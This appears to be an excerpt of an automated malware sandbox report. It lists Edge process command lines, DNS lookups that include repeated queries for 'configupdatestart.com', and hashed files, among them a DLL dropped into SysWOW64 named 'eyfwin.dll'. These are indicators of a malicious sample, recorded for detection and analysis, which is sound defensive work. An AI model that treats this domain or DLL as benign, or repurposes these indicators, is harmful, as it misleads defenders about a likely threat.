"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 208.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
memory/2096-0-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Windows\SysWOW64\eyfwin.dll
| MD5 | 732cadeaf934ac1edc47f1a577eca711 |
| SHA1 | 444f18e24d9c48e99b142c85ba6e65cba693988f |
| SHA256 | e232ef1159527f8ef57f480dcf0399d9b718354e90449545b1a3b7ea30015871 |
| SHA512 | 9b8a8e36b8e7292915a99a47796cd89dab6af4a506bf956093cbcefc24a4b7d3864f26c50d4b4326c38d03a8aca8c4be822e1702b436e9a97b1e084c6e9c0e5f |
memory/2096-29-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1386433ecc349475d39fb1e4f9e149a0 |
| SHA1 | f04f71ac77cb30f1d04fd16d42852322a8b2680f |
| SHA256 | a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc |
| SHA512 | fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e |
\??\pipe\LOCAL\crashpad_5116_NKYUNPLPEKLHMVSD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b09b1e217ce2b60ba6be793c23caafa3 |
| SHA1 | d6debfe5d552293ab8781e8d45dee4a2cfb5635e |
| SHA256 | e9713de62aa928411d91507c5bf05e9cc6bd1ab1f494b48703f039876e986193 |
| SHA512 | ec21be7c597502648e8d74207a9371d3fde762bc853c62263f02ce70fa7be073a2caa364c3ae5390d2e8704e741d0769a6116e14f4be9b629a92f8a6d718e1c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\60d0e30b-3aae-4d4c-a160-9dec8624c188.tmp
| MD5 | 7a742df440dfce965bc943b3d52043b3 |
| SHA1 | b36169f5a8b66c4faee010583872c67b65df04b4 |
| SHA256 | eea4a0179cf1c166c0509f6caede3bd57b4fe9ff07f62e25b9be1b083366c465 |
| SHA512 | 6868cd6eb7b50cbe0fae51def840761d1003d2193e77d512449113c7fa728cf08cb201a962ec9b2503efd76df5a56252e7cea00a0d2db6b7c6d69ec0c3048be2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0591379cac5973852be77ad276026495 |
| SHA1 | 81f458db4ef0484e520e660f37306234a267614e |
| SHA256 | c0079cbd1beac2a5588e5f3d4b59ba5237661d9944315bdba32581a6260da4f9 |
| SHA512 | 1d3b61279e0649d5310ad08e4074f312c3baf8b580cedcf85f4d56f51467b4383b8e981e6aa3de021e7178aa41d0c8e935d8a67c06fbb47824171ea83d1701be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e664066e3aa135f185ed1c194b9fa1f8 |
| SHA1 | 358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5 |
| SHA256 | 86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617 |
| SHA512 | 58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e |